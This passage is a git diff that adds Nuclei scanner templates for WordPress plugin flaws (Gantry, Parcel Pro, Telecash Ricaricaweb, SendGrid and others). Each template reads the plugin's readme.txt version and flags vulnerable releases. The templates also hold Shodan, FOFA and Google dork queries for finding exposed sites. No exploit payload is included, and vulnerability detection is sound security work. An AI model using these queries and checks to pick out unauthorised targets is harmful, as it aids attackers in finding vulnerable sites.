https://www.wordfence.com/threat-intel/vulnerabilities/id/d539a066-6b59-4235-868e-f3085436e9f4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9382 + metadata: + fofa-query: "wp-content/plugins/gantry/" + google-query: inurl:"/wp-content/plugins/gantry/" + shodan-query: 'vuln:CVE-2024-9382' + tags: cve,wordpress,wp-plugin,gantry,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gantry/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gantry" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.21') \ No newline at end of file diff --git a/poc/sql/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml b/poc/sql/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml new file mode 100644 index 0000000000..f00468ecf9 --- /dev/null +++ b/poc/sql/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml @@ -0,0 +1,59 @@ +id: woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef + +info: + name: > + Parcel Pro <= 1.8.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-parcel-pro/" + google-query: inurl:"/wp-content/plugins/woo-parcel-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-parcel-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-parcel-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-parcel-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.4') \ No newline at end of file diff --git a/poc/web/telecash-ricaricaweb.yaml b/poc/web/telecash-ricaricaweb.yaml new file mode 100644 index 0000000000..53b2f86628 --- /dev/null +++ b/poc/web/telecash-ricaricaweb.yaml @@ -0,0 +1,59 @@ +id: telecash-ricaricaweb + +info: + name: > + Telecash Ricaricaweb <= 2.2 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fa6998-b85a-413e-be00-81926b4ea6ab?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/telecash-ricaricaweb/" + google-query: inurl:"/wp-content/plugins/telecash-ricaricaweb/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,telecash-ricaricaweb,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/telecash-ricaricaweb/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "telecash-ricaricaweb" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/wordpress/easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5.yaml b/poc/wordpress/easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5.yaml new file mode 100644 index 0000000000..34b309e326 --- /dev/null +++ b/poc/wordpress/easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5.yaml @@ -0,0 +1,59 @@ +id: easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5 + +info: + name: > + Easy Menu Manager | WPZest <= 1.0.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f60df43a-eef3-449d-96fd-b26e28361f81?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-menu-manager-wpzest/" + google-query: inurl:"/wp-content/plugins/easy-menu-manager-wpzest/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-menu-manager-wpzest,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-menu-manager-wpzest/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-menu-manager-wpzest" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/wordpress/mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0.yaml b/poc/wordpress/mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0.yaml new file mode 100644 index 0000000000..168df00922 --- /dev/null +++ b/poc/wordpress/mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0.yaml @@ -0,0 +1,59 @@ +id: mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0 + +info: + name: > + MAS Companies For WP Job Manager <= 1.0.13 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc277e7c-86ec-448f-a91e-e4d12a4b4177?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mas-wp-job-manager-company/" + google-query: inurl:"/wp-content/plugins/mas-wp-job-manager-company/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mas-wp-job-manager-company,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mas-wp-job-manager-company/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mas-wp-job-manager-company" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.13') \ No newline at end of file diff --git a/poc/wordpress/wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d.yaml b/poc/wordpress/wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d.yaml new file mode 100644 index 0000000000..224807c50a --- /dev/null +++ b/poc/wordpress/wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d.yaml @@ -0,0 +1,59 @@ +id: wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d + +info: + name: > + SendGrid for WordPress <= 1.4 - Missing Authorization to Authenticated (Subscriber+) Log Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb7d99a7-1e7d-43e1-839c-286b454c8276?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-sendgrid-mailer/" + google-query: inurl:"/wp-content/plugins/wp-sendgrid-mailer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-sendgrid-mailer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-sendgrid-mailer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-sendgrid-mailer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4') \ No newline at end of file